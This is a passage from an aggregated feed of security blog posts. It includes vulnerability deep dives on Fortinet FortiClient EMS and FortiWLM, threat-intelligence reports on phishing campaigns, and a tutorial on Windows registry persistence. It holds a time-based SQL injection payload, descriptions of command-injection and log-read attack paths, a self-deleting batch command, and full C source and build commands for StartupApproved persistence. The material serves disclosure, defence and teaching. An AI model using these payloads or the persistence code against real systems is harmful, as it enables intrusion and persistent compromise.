Normal view

There are new articles available, click to refresh the page.
Before yesterdayPentest/Red Team

The Cybersecurity Skills Gap: Time to Step Up with OffSec’s Red Teaming and IoT Learning Paths

By: OffSec
26 March 2024 at 17:08

The cybersecurity landscape is indeed challenged by a significant skills gap, with reports highlighting the critical shortage of professionals equipped to handle escalating cyber threats. The 2023 Global Cybersecurity Skills Gap Report from Fortinet underscores the urgency of this issue, revealing that a vast majority of organizations are facing more breaches due to a lack of skilled cybersecurity professionals. Specifically, the report found that 86% of decision-makers in cybersecurity recognize that the manpower shortage increases cyber risks for companies. 

OffSec is on a mission to address this critical challenge with its cutting-edge Red Teaming and Internet of Things (IoT) Learning Paths. These in-depth programs transcend generic tutorials, equipping learners with the real-world skills to tackle the complex security vulnerabilities in two of today’s most targeted areas.

... Read more »

The post The Cybersecurity Skills Gap: Time to Step Up with OffSec’s Red Teaming and IoT Learning Paths appeared first on OffSec.

Horizon3.ai Garners Spot in 2024 CRN® Partner Program Guide

25 March 2024 at 14:12

Business Wire 03/25/2024

Horizon3.ai, a pioneer in autonomous security solutions, has been honored by CRN®, a brand of The Channel Company, with inclusion in its 2024 Partner Program Guide. This annual guide provides essential information to solution providers exploring technology vendor partner programs…

Read the entire article here

The post Horizon3.ai Garners Spot in 2024 CRN® Partner Program Guide appeared first on Horizon3.ai.

CISSP is changing! Common body of knowledge changes for 2024 | Cyber Work Hacks

By: Infosec
21 March 2024 at 18:00

Cyber Work Hacks is back to keep you updated with the CISSP exam! Infosec boot camp instructor Steve Spearman joins me to tell us about the new changes to the CISSP’s common body of knowledge (CBK) and how the changes to the CBK should (or shouldn’t!) affect your study and preparation for the exam! Keep learning, and keep it here for another Cyber Work Hack.

– Learn more about the CISSP: https://www.infosecinstitute.com/training/cissp/
– Get your free ebook, "CISSP exam tips and tricks (to ace your exam on the first try)": https://www.infosecinstitute.com/form/cissp-exam-tips-ebook/
 
0:00 - CISSP exam common body of knowledge 
1:16  - Changes to CISSP's CBK
7:45 - Why did CISSP make CBK changes?
9:17 - How to study for the CISSP
11:37 - Most important CISSP exam items 
14:04 - Best advice for taking the CISSP exam
15:03 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Citrix ADC – Unexpected Treasure

By: Ylabs
21 March 2024 at 16:31
Reading Time: 10 minutes  TL;DR Setting secure rules for the RelayState parameter is a MUST when configuring Citrix Application Delivery Controller (ADC) and Citrix Gateway as SAML Service Provider, because an attacker can exploit a chain of three low-risk vulnerabilities to compromise victims’ accounts. By luring users to a malicious domain, attackers can steal session cookies and gain unauthorized […]

Elevate Your Cybersecurity Strategy: Download the 2023 Year in Review

22 March 2024 at 13:00

In our groundbreaking 2023 Year in Review, Horizon3.ai delves into the transformative approach of autonomous pentesting with NodeZero. This pivotal document is your gateway to mastering proactive cybersecurity defense mechanisms.

Here’s what you'll discover:

The Attacker's Perspective

Learn how thinking like an attacker can uncover hidden vulnerabilities.

Overcoming Common Cyber Threats

Insight into the most prevalent cybersecurity challenges today, including credential issues and software vulnerabilities.

Innovative Mitigation Strategies

Practical guidance on enhancing your security posture through advanced mitigation techniques.

Policy Recommendations

Expert advice on shaping policies to bolster your defenses against emerging threats.

Continuous Security Assessment

The importance of ongoing evaluation and adaptation to stay ahead of cyber adversaries.

Download now to unlock the secrets to a more resilient cybersecurity framework.

The post Elevate Your Cybersecurity Strategy: Download the 2023 Year in Review appeared first on Horizon3.ai.

CVE-2023-48788: Fortinet FortiClient EMS SQL Injection Deep Dive

21 March 2024 at 10:58

Introduction

In a recent PSIRT, Fortinet acknowledged CVE-2023-48788 – a SQL injection in FortiClient EMS that can lead to remote code execution. FortiClient EMS is an endpoint management solution for enterprises that provides a central location for administering enrolled endpoints. This SQL injection vulnerability is caused by user controlled strings that are passed directly into database queries. In this post we will examine the internal workings of the exploit. Our POC can be found here.

An improper neutralization of special elements used in an SQL Command (‘SQL Injection’) vulnerability [CWE-89] in FortiClientEMS may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests.

FortiClient EMS Architecture

For the purposes of understanding this vulnerability, FortiClient EMS consists the following components:

  • FmcDaemon.exe – The main service responsible for communicating with enrolled clients. By default, this service listens on port 8013 for incoming client connections
  • FCTDas.exe – The Data Access Server responsible for translating requests from various other server components into SQL requests. This service interacts with the Microsoft SQL Server database.
  • One or more endpoint clients – These clients communicate with the FmcDaemon on the server (by default tcp/8013)

Finding the Vulnerable Component

Since we know the vulnerability is a SQL injection, our initial triage consisted of scanning the installation folder for common SQL strings.

Search for SQL Strings

Search for SQL Strings

Upon further examination, we find that FCTDas.exe has established connections to the local database over tcp/1433. We also see that it listens for incoming connections over localhost port tpc/65432.

FCTDas connections

FCTDas connections

Examining other services on this server, we find that FcmDaemon.exe makes connections to FCTDas.exe and listens externally on tcp/8013. We have a decent hunch now that we can use tcp/8013 to interact indirectly with FCTDas and make database queries.

Finding and Triggering the Vulnerability

We wanted to see what normal communications between a client and the FcmDaemon should look like. To accomplish this, we configured an installer and deployed a basic endpoint client. We found that normal communications between an endpoint client and FcmDaemon.exe are encrypted with TLS, and there didn’t seem to be an easy way to dump TLS session keys to decrypt the legitimate traffic. Luckily, after we enabled Debug logging, the FcmDaemon log provided some detail about the communications.

FcmDaemon Logs

FcmDaemon Logs

This was enough information to get us started with a Python script to communicate with the FcmDaemon, however, we weren’t able to get it to respond with anything besides a continuation message.

At this point, we opened FcmDaemon.exe and IDA and began reverse engineering the message format. We noticed that many of the message handling functions were making use of functionality from policyhelper.dll. Instead of reverse engineering the entire message format, we opened Windbg and set a breakpoint on policyhelper!processRequest. After some time, the client beaconed to the server and we are able to see the message buffer in rdx.

Using Windbg to examine message format

Using Windbg to examine message format

We can see that the message format is a pretty simple text based format. We have a message header with various fields each separated by a newline, a carriage return and newline separating the header from the body, and two carriage return newlines to end the body. With this information, we are able to update our Python script to meaningfully communicate with the FcmDaemon.

In the DAS log, we were able to see many SQL statements that used the FCTUID as part of the query. For example:

SQL query in DAS log

SQL query in DAS log

Based on this, we were hopeful that by simply updating the FCTUID present in many of the FcmDaemon messages, we would be able to trigger a SQL injection. We constructed a simple sleep payload of the form <fctid>' AND 1=0; WAITFOR DELAY '00:00:10' -- '. We noticed the 10 second delay in response and knew that we had triggered the exploit!

From SQL Injection to RCE

To turn this SQL injection vulnerability into remote code execution we used the built-in xp_cmdshell functionality of Microsoft SQL Server. Initially, the database was not configured to run the xp_cmdshell command, however it was trivially enabled with a few other SQL statements. The POC we are releasing only confirms the vulnerability by using a simple SQL injection without xp_cmdshell. To enable RCE, altering the POC is necessary.

Indicators of Compromise

There are various log files in C:\Program Files (x86)\Fortinet\FortiClientEMS\logs that can be examined for connections from unrecognized clients or other malicious activity. The MS SQL logs can also be examined for evidence of xp_cmdshell being utilized to obtain command execution.

xp_cmdshell logs

xp_cmdshell logs

Its important to realize that an attacker may have used different techniques to gain execution or may have cleaned evidence from logs after exploitation.

NodeZero

NodeZero Attack Path utilizing CVE-2023-48788 to load a remote access tool and dump LSASS 

Horizon3.ai clients and free-trial users alike can run a NodeZero operation to determine the exposure and exploitability of this issue.

Sign up for a free trial and quickly verify you’re not exploitable.

Start Your Free Trial

 

The post CVE-2023-48788: Fortinet FortiClient EMS SQL Injection Deep Dive appeared first on Horizon3.ai.

Fluffy Wolf sends out reconciliation reports to sneak into corporate infrastructures

By: BI.ZONE
19 March 2024 at 12:01

The group has adopted a simple yet effective approach to gain initial access: phishing emails with an executable attachment. This way, Fluffy Wolf establishes remote access, steals credentials, or exploits the compromised infrastructure for mining.

The BI.ZONE Threat Intelligence team has detected a previously unknown cluster, dubbed Fluffy Wolf, whose activity can be traced back to 2022. The group uses phishing emails with password-protected archive attachments. The archives contain executable files disguised as reconciliation reports. They are used to deliver various tools to a compromised system, such as Remote Utilities (legitimate software), Meta Stealer, WarZone RAT, or XMRig miner.

Key findings

  1. Phishing emails remain an effective method of intrusion: at least 5% of corporate employees download and open hostile attachments.
  2. Threat actors continue to experiment with legitimate remote access software to enhance their arsenal with new tools.
  3. Malware-as-a-service programs and their cracked versions are expanding the threat landscape in Russia and other CIS countries. They also enable attackers with mediocre technical skills to advance attacks successfully.

The campaign

One of the latest campaigns began with the attackers sending out phishing emails, pretending to be a construction firm (fig. 1). The message titled Reports to sign had an archive with the password included in the file name.

Fig. 1. Phishing email

The archive contained a file Akt_Sverka_1C_Doc_28112023_PDF.com (a reconciliation report) that downloaded and installed Remote Utilities (a remote access tool) and launched Meta Stealer.

When executed, the malicious file performed the following actions:

  • replicated itself in the directory C:\Users\[user]\AppData\Roaming, for example, as Znruogca.exe (specified in the configuration)
  • created a Znruogca registry key with the value equal to the replicated file path, in the registry section HKCU\Software\Microsoft\Windows\CurrentVersion\Run to run the malware after system reboot
  • launched the Remote Utilities loader that delivers the payload from the C2 server
  • started a copy of the active process and injected Meta Stealer’s payload into it

The Remote Utilities installer is an NSIS (Nullsoft Scriptable Install System) that copies program modules to C:\ProgramData\TouchSupport\Bin and runs the Remote Utilities executable—wuapihost.exe.

Remote Utilities is a legitimate remote access tool that enables a threat actor to gain complete control over a compromised device. Thus, they can track the user’s actions, transmit files, run commands, interact with the task scheduler, etc. (fig. 2).

Fig. 2. Remote Utilities official website

Meta Stealer is a clone of the popular RedLine stealer which is frequently used in attacks against organizations in Russia and other CIS countries. Among others, this stealer was employed by the Sticky Wolf cluster.

The stealer can be purchased on underground forums and the official Telegram channel (fig. 3)

Fig. 3. Message in the Telegram channel

A monthly subscription for the malware may cost as little as 150 dollars while a lifetime license can be purchased for 1,000 dollars. It is noteworthy that Meta Stealer is not banned in the CIS countries.

The stealer allows the attackers to retrieve the following information about the system:

  • username
  • screen resolution
  • operating system version
  • operating system language
  • unique identifier (domain name + username + device serial number)
  • time zone
  • CPU (by sending a WMI request SELECT * FROM Win32_Processor)
  • graphics cards (by sending a WMI request SELECT * FROM Win32_VideoController)
  • browsers (by key enumeration in the register hives SOFTWARE\WOW6432Node\Clients\StartMenuInternet and SOFTWARE\Clients\StartMenuInternet)
  • software (by key enumeration in the register hives SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall)
  • security solutions (by sending WMI requests SELECT * FROM AntivirusProduct, SELECT * FROM AntiSpyWareProduct and SELECT * FROM FirewallProduct)
  • processes running (by sending a WMI request SELECT * FROM Win32_Process Where SessionId='[running process session]')
  • keyboard layouts
  • screenshots

Then it collects and sends the following information to the C2 server:

  • files that match the mask specified in the configuration
  • credentials and cookies from Chromium and Firefox-like browsers (browser paths are specified in the configuration)
  • FileZilla data
  • cryptocurrency wallet data (specified in the configuration)
  • data from the VPN clients installed on the compromised device (NordVPN, ProtonVPN)

We were also able to link this cluster to some previous campaigns that used different sets of tools:

  • a universal loader that spreads the payloads of the Remote Utilities installer and the Meta Stealer
  • an installer with the Meta Stealer payload that downloads Remote Utilities from the C2 server
  • the Remote Utilities installer only, without Meta Stealer
  • WarZone RAT, another malware-as-a-service solution, instead of Remote Utilities
  • a loader for Remote Utilities, Meta Stealer, and WarZone RAT in a single file
  • a miner as an additional tool

Conclusions

The duration and variety of attacks conducted by clusters of activity such as Fluffy Wolf prove their effectiveness. Despite the use of fairly simple tools, the threat actors are able to achieve complex goals. This once again highlights the importance of threat intelligence. Having access to the latest data, companies can promptly detect and eliminate malicious activity at the early stages of the attack cycle.

Indicators of compromise

bussines-a[.]ru
3aaa68af37f9d0ba1bc4b0d505b23f10a994f7cfd9fdf6a5d294c7ef5b4c6a6a
794d27b8f218473d51caa9cfdada493bc260ec8db3b95c43fb1a8ffbf4b4aaf7

MITRE ATT&CK

More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.

How to protect your company from such threats

Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.

To stay ahead of threat actors, you need to be aware of the methods used in attacks against different infrastructures and to understand the threat landscape. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence platform. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect against the most critical threats to the company.

CISSP exam tips and tricks: Top test-taking strategies | Cyber Work Hacks

By: Infosec
15 March 2024 at 18:00

Infosec and Cyber Work Hacks are here to help you pass the CISSP exam. Today’s Hack is part two, so I encourage you to go back and listen to part one of Steve Spearman’s CISSP exam tips and tricks. In part two, I pass the mic to Spearman to give you his top five test-taking strategies for the CISSP. What’s the Sesame Street rule? How does the CISSP feel about absolutes? Keep it here, and you’ll find out in part two of this week’s Cyber Work Hack. 

– Learn more about the CISSP: https://resources.infosecinstitute.com/overview/cissp/
– Get your free ebook, "CISSP exam tips and tricks (to ace your exam on the first try)": https://www.infosecinstitute.com/form/cissp-exam-tips-ebook/

1:30 - Look for absolutes in questions
3:17 - The Sesame Street principle 
4:45 - Watch for algebraic equations 
6:23 - Look for the "golden words"
7:38 - Change management is likely the answer
8:55 - Keep an eye on senior management and impact
10:19 - Think like a CISO
11:53 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Malware development: persistence - part 24. StartupApproved. Simple C example.

12 March 2024 at 00:00

Hello, cybersecurity enthusiasts and white hackers!

pers

This post is based on my own research into one of the another interesting malware persistence tricks: via StartupApproved Registry key.

StartupApproved

The very first post in the series about persistence, I wrote about one of the most popular and already classic techniques, via Registry Run keys.

An uncommon Registry entry utilized by the standard “startup” process (i.e., the one mostly controlled by Windows Explorer, such as the Run and RunOnce keys, the Startup folder, etc.) after userinit.exe completes its operation, is located at the following location in the Registry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run

Turns out, this key is populated when entries are enabled or disabled via the Windows Task Manager’s Startup tab:

pers

The good news is that we can use this registry path for persistence.

practical example

First of all, check Registry keys by the following command:

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved" /s

pers

At the next step, as usually, create our “evil” application (hack.c):

/*
hack.c
simple DLL messagebox
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  nReason, LPVOID lpReserved) {
  switch (nReason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(
      NULL,
      "Meow-meow!",
      "=^..^=",
      MB_OK
    );
    break;
  case DLL_PROCESS_DETACH:
    break;
  case DLL_THREAD_ATTACH:
    break;
  case DLL_THREAD_DETACH:
    break;
  }
  return TRUE;
}

As usually, just meow-meow messagebox.

Then we just modifying our HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved registry key, like this (pers.c):

/*
pers.c
windows persistence
via StartupApproved
author: @cocomelonc
https://cocomelonc.github.io/malware/2024/03/12/malware-pers-24.html
*/
#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  BYTE data[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};

  const char* path = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run";
  const char* evil = "Z:\\2024-03-12-malware-pers-24\\hack.dll";

  LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) path, 0, KEY_WRITE, &hkey);
  printf (res != ERROR_SUCCESS ? "failed open registry key :(\n" : "successfully open registry key :)\n");

  res = RegSetValueEx(hkey, (LPCSTR)evil, 0, REG_BINARY, data, sizeof(data));
  printf(res != ERROR_SUCCESS ? "failed to set registry value :(\n" : "successfully set registry value :)\n");

  // close the registry key
  RegCloseKey(hkey);

  return 0;
}

As you can the the logic of our Proof of Concept is pretty simple - we set the value of the registry entry to 0x02 0x00... binary value.

demo

Let’s go to see everything in action. First of all, compile our “malware” DLL:

x86_64-w64-mingw32-g++ -shared -o hack.dll hack.c -fpermissive

pers

Then, compile our PoC:

x86_64-w64-mingw32-g++ -O2 pers.c -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

pers

Finally, run it on the victim’s machine. In my case, for Windows 10 x64 v1903 VM, it is looks like this:

.\pers.exe

pers

As you can see, I also checked registry again:

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved" /s

pers

Then, logout and login again:

pers

pers

But unexpectedly it didn’t work for me…

Then, I just update the name of entry:

pers

Logout and login, little bit wait…. and it’s worked perfectly….

pers

pers

So I updated one line in my script:

/*
pers.c
windows persistence
via StartupApproved
author: @cocomelonc
https://cocomelonc.github.io/malware/2024/03/12/malware-pers-24.html
*/
#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  BYTE data[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};

  const char* path = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run";
  const char* evil = "C:\\temp\\hack.dll";

  LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) path, 0, KEY_WRITE, &hkey);
  printf (res != ERROR_SUCCESS ? "failed open registry key :(\n" : "successfully open registry key :)\n");

  res = RegSetValueEx(hkey, (LPCSTR)evil, 0, REG_BINARY, data, sizeof(data));
  printf(res != ERROR_SUCCESS ? "failed to set registry value :(\n" : "successfully set registry value :)\n");

  // close the registry key
  RegCloseKey(hkey);

  return 0;
}

But there is a caveat. Sometimes when I tested this feature, it launched like Skype for me:

pers

pers

As you can see, everything worked perfectly as expected! =^..^= :)

This technique is used by APT groups like APT28, APT29, Kimsuky and APT33 in the wild. In all honesty, this method is widely employed and widespread due to its extreme convenience in deceiving the victims.

I hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers arsenal.

This is a practical case for educational purposes only.

ATT&CK MITRE: T1547.001
Malware persistence: part 1
APT28
APT29
Kimsuky
APT33
source code in github

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

Starting 2024 strong – The largest launch of security training from OffSec

By: OffSec
14 March 2024 at 15:11

Strong cybersecurity relies on an understanding of the importance of security throughout the entire organization. OffSec is committed to delivering security training to offensive, defensive, development and IT teams that can best protect organizations.

In the first 10 weeks of 2024, we’ve released new learning paths to support more security training across the organization. No matter your role or area of expertise, this training will help develop a security mindset for more folks within your organization.

We’ve put together a 20-minute highlight video explaining all the cool stuff that we’ve released and what’s coming in the next 10 weeks. 

... Read more »

The post Starting 2024 strong – The largest launch of security training from OffSec appeared first on OffSec.

Fortinet FortiWLM Deep-Dive, IOCs, and the Almost Story of the “Forti Forty”

14 March 2024 at 09:45

Early in 2023, soon after reproducing a remote code execution vulnerability for the Fortinet FortiNAC, I was on the hunt for a set of new research targets. Fortinet seemed like a decent place to start given the variety of lesser-known security appliances I had noticed while searching for the FortiNAC firmware. The first target I landed on was the Fortinet Wireless LAN Manager (WLM). The security audit of this appliance began what became the successful, but failed journey of what I dubbed the “Forti Forty” – a goal to find 40 CVE’s in Fortinet appliances. The journey ended in 16 mostly critical and high security issues identified across the FortiWLM, FortiSIEM, and another appliance before it was cut short when Fortinet’s download portal no longer provided access to download their appliances.

This blog details several of the issues discovered in the FortiWLM that have since been patched:

  1. CVE-2023-34993 – Multiple Unauthenticated Command Injections – PSIRT-23-140
  2. CVE-2023-34991 – Unauthenticated SQL Injection – PSIRT-23-142
  3. CVE-2023-42783 – Unauthenticated Arbitrary File Read – PSIRT-23-143
  4. CVE-2023-48782 – Authenticated Command Injection – PSIRT-23-450

Additionally two vulnerabilities that have not received patches leading to appliance compromise:

  1. Unauthenticated Limited Log File Read – Allows retrieval of arbitrary log files which contain administrator session ID tokens
  2. Static Session ID Vulnerability – Session IDs do not change between sessions for users. Chained with the above issue allows trivial compromise of the device.

Fortinet Wireless LAN Manager Overview

Fortinet’s Wireless LAN Manager allows for ease of management of wireless devices throughout an enterprise. It remotely monitors the devices health, performance, and any RF interference all in a single pane of glass. It’s commonly deployed in large campus settings like universities, hospitals, and other large office footprints – making it a valuable target of interest in today’s threat landscape.

Figure 1. FortiWLM Dashboard

FortiWLM Web Framework and Middleware

The FortiWLM web services are built atop the Apache2 and Django frameworks. The Apache configuration has defined several rewrite rules from the frontend on tcp/443 and passes them back to the Django framework middleware which listens on localhost tcp/8000.

The core of the Django middleware logic lies within the /opt/meru/etc/ws/wlmweb directory. Inspecting the file /opt/meru/etc/ws/wlmweb/wlmweb/wlmrbac.py, within the process_view() function, we see that several endpoints depending on the request path are validated against the current requests session authentication information.

On line 86, the two endpoints are explicitly allowed for any request without any authentication checks:

  1. /ems/cgi-bin/ezrf_upgrade_images.cgi
  2. /ems/cgi-bin/ezrf_lighttpd.cgi

Figure 2. wlmrbac.py authentication checks

Path to Remote Code Execution #1

CVE-2023-34993: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability

This vulnerability allows remote, unauthenticated attackers to inject a crafted malicious string in a request to the /ems/cgi-bin/ezrf_upgrade_images.cgi endpoint that will be executed in the context of root. The issue results from the lack of proper validation of results and calls to the potentially dangerous function system(). 

The first endpoint explicitly allowed without authentication, /ems/cgi-bin/ezrf_upgrade_images.cgi, can be found at /opt/meru/etc/ws/cgi-bin/ezrf_upgrade_images.cgi. All CGI endpoints are Perl scripts which, depending on the endpoint, parse different request parameters which are sometimes validated, but sometimes not. 

This ezrf_upgrade_image.cgi endpoint parses the op_type request parameter, and depending on the value, passes control to different defined functions within the script.

Figure 3. ezrf_upgrade_images.cgi operation types

The deleteprogressfile() function extracts the progressfile request parameter and then directly passes it to a call to system() without any input validation.

Figure 4. ezrf_upgrade_images.cgi’s vulnerable deleteprogressfile()

Sending a request to this unauthenticated endpoint with op_type=deleteprogressfile and a  malicious string in the progressfile parameter results in remote code execution in the context of the root user.

Figure 5. Unauthenticated RCE as root via ezrf_ugprade_image.cgi endpoint

Path to Remote Code Execution #2

CVE-2024-???? (0-day): Fortinet FortiWLM Unauthenticated Limited File Read Vulnerability

This vulnerability allows remote, unauthenticated attackers to access and abuse builtin functionality meant to read specific log files on the system via a crafted request to the /ems/cgi-bin/ezrf_lighttpd.cgi endpoint. This issue results from the lack of input validation on request parameters allowing an attacker to traverse directories and read any log file on the system.

The second endpoint explicitly allowed without authentication, /ems/cgi-bin/ezrf_lighttpd.cgi, can be found at /opt/meru/etc/ws/cgi-bin/ezrf_lighttpd.cgi. Again, this CGI endpoint is a Perl script in which different request parameters are not always validated.

When the op_type is upgradelogs, control is passed to the upgradelogs() function. This function will read the specific log file from the system and return its content in the response.

Figure 6. ezrf_lighttpd.cgi upgradelogs() function

Inspecting how the $filename variable is constructed we see that it is partially controlled by the imagename request parameter.

Figure 7. ezrf_lighttpd.cgi attacker controlled input unvalidated

Abusing the lack of input validation, an attacker can construct a request where the imagename parameter contains a path traversal, allowing the attacker to read any log file on the system.

Luckily for an attacker, the FortiWLM has very verbose logs – and logs the session ID of all authenticated users. Abusing the above arbitrary log file read, an attacker can now obtain the session ID of a user and login and also abuse authenticated endpoints.

Figure 8. Leak Session ID with Unauthenticated Arbitrary Log File Read

CVE-2023-48782: Fortinet FortiWLM Authenticated Command Injection Vulnerability

This vulnerability allows remote, authenticated attackers to inject a crafted malicious string in a request to the /ems/cgi-bin/ezrf_switches.cgi endpoint that will be executed in the context of root. The issue results from the lack of proper validation of results and insecure use of the dangerous system calls. This endpoint is accessible for both low privilege users and admins.

The ezrf_switches.cgi endpoint supports several op_type subfunctions related to adding a LAN switch for monitoring. This CGI script can be found at /opt/meru/etc/ws/cgi-bin/ezrf_switches.cgi.

The updateStatus() helper function, called in two different op_type functions, is vulnerable to command injection of both the $switche_table_k_Hostname and $switche_table_k_CommunityString variables which are derived from user input.

Figure 9. ezrf_switches.cgi vulnerable updateStatus()

Both addSwitche() and editSwitche() functions call the vulnerable updateStatus() helper function without validating any input. 

Figure 10. ezrf_switches.cgi addSwitche() calls updateStatus()

Tracing those variables to where they are declared, they are derived straight from the request parameters Hostname and CommunityString, and are never validated along the way.

Figure 11. ezrf_switches.cgi request parameters unvalidated

Combining both the unauthenticated arbitrary log file read and this authenticated command injection, an unauthenticated attacker can obtain remote code execution in the context of root.

Figure 12. Abusing Unauth Log Read and Auth Command Injection to obtain root RCE

Other Security Issues

The initial report to Fortinet contained a total of 9 specific security issues, largely concentrated on the unauthenticated endpoints discovered in the Django middleware. The authenticated attack surface is large, and at the time contained numerous issues that were similar in nature to the ones detailed here stemming from a lack of input validation. Two additional security issues of note reported and patched, but unused in the attack paths were:

CVE-2023-42783: Fortinet FortiWLM Unauthenticated Arbitrary File Read Vulnerability

This vulnerability allows remote, unauthenticated attackers to access and abuse builtin functionality meant to read specific log files on the system via a crafted request to the /ems/cgi-bin/ezrf_upgrade_images.cgi endpoint in the uploadstatus function with the progressfile parameter. This issue results from the lack of input validation on request parameters allowing an attacker to traverse directories and read any file on the system.

CVE-2023-34991: Fortinet FortiWLM Unauthenticated SQL Injection Vulnerability

This vulnerability allows remote, unauthenticated attackers to access and abuse builtin functionality meant to list images on the system via a crafted request to the /ems/cgi-bin/ezrf_upgrade_images.cgi endpoint in the editimage function with the imageName and description parameters. This issue results from the lack of input validation on request parameters allowing an attacker to modify a SQL query string.

CVE-2024-???? (0-day): Fortinet FortiWLM Static Session ID Vulnerability

The web session ID token of authenticated users remains static, and unchanged, for users between sessions. Each time a user logs in, they receive the exact same session ID token. This token remains static for each boot of the device. An attacker that can obtain this token can abuse this behavior to hijack sessions and perform administrative actions. This session ID is retrievable with the unpatch limited log file read vulnerability above and can be user to gain administrative permissions to the appliance.

Internet Exposure

While we found it to be popular with State, Local, and Education (SLED) and healthcare focused customers, luckily the internet exposure is fairly limited to around 15 instances.

Figure 13. Shodan Exposure

Indicators of Compromise

The FortiWLM logs the majority of its application activities in the /data/apps/nms/logs directory. Specifically activity related to the exploitation these issues can be observed in the /data/apps/nms/logs/httpd_error_log.log file. Example entries of the log file included below show the exploitation of the unauthenticated remote code execution vulnerability, CVE-2023-34993. If defenders suspect that an appliance has been compromised, the logged request parameters should be analyzed to determine if they appear malicious.

Figure 14. httpd_error_log.log example entry

Timeline

12 May 2023 – Submitted report to Fortinet PSIRT

15 May 2023 – PSIRT acknowledges receipt

10 July 2023 – PSIRT reproduces issues and indicates fix is in-progress

10 August 2023 – Ask for update, PSIRT responds fix is awaiting release

11 October 2023 – PSIRT releases fixes for 2 reported issues

14 November 2023 – PSIRT releases fixes for 2 more reported issues

21 November 2023 – Indicate to PSIRT of intent to publicly disclose all issues

22 November 2023 – PSIRT indicates remaining 3 vulnerabilities will be patched soon

7 December 2023 – PSIRT releases 1 fix for more reported issues

23 February 2024 – RingZer0 conference talk discussing some of these vulnerabilities

14 March 2024 – This public disclosure after 307 days with two unpatched vulnerabilities

The post Fortinet FortiWLM Deep-Dive, IOCs, and the Almost Story of the “Forti Forty” appeared first on Horizon3.ai.

What’s the true impact on your organization when an employee is phished?

6 March 2024 at 21:00

You can now fully assess the impact of phished credentials on your organization. Tune into this webinar to watch the NodeZero platform evaluating the blast radius of every phished credential as it comes in using the Phishing Impact test.

The post What’s the true impact on your organization when an employee is phished? appeared first on Horizon3.ai.

Mysterious Werewolf hits defense industry with new RingSpy backdoor

By: BI.ZONE
13 March 2024 at 10:42

The criminal group gains initial access through phishing emails with a compressed executable that unleashes RingSpy, an original remote access backdoor.

The BI.ZONE Threat Intelligence team has detected a new campaign by Mysterious Werewolf, a cluster that has been active since at least 2023. This time, the adversaries are targeting defense enterprises. To achieve their goals, they use phishing emails with an archive attached. The archive contains a legitimate PDF document and a malicious CMD file. Once the document is extracted and double-clicked, the exploit launches the CMD file to deliver the RingSpy backdoor to the compromised system. This malware has replaced the Athena agent (Mythic C2 framework) utilized by Mysterious Werewolf in its previous attacks.

Key findings

  1. Mysterious Werewolf continues to use phishing emails and CVE-2023–38831 in WinRAR to run malicious code in target systems.
  2. The threat actors are experimenting with malicious payload. Now they have opted for RingSpy, a Python backdoor, to replace the Athena agent (Mythic C2 framework).
  3. As before, the cluster abuses legitimate services to communicate with compromised systems. Thus, the criminals have turned a Telegram bot into their command-and-control server.

Attack description

The victim presumably receives an email with an archive that enables the criminals to exploit CVE-2023–38831. Opening the legitimate file in the archive launches a malicious script (e.g, O_predostavlenii_kopii_licenzii.pdf .cmd) that:

  • creates a.vbs file in the folder C:\Users\[user]\AppData\Local and writes a script to run the file whose name was passed as an argument
  • creates a 1.bat file in the folder C:\Users\[user]\AppData\Local and launches it with a command call "%localappdata%\.vbs" "%localappdata%\1.bat"
  • self-deletes after the launch:
    (goto) 2>nul & del "%~f0"

The running of 1.bat makes it possible to:

  • obtain the download link for the next stage of intrusion and save it in the r file in the folder C:\Users\[user]\AppData\Local:
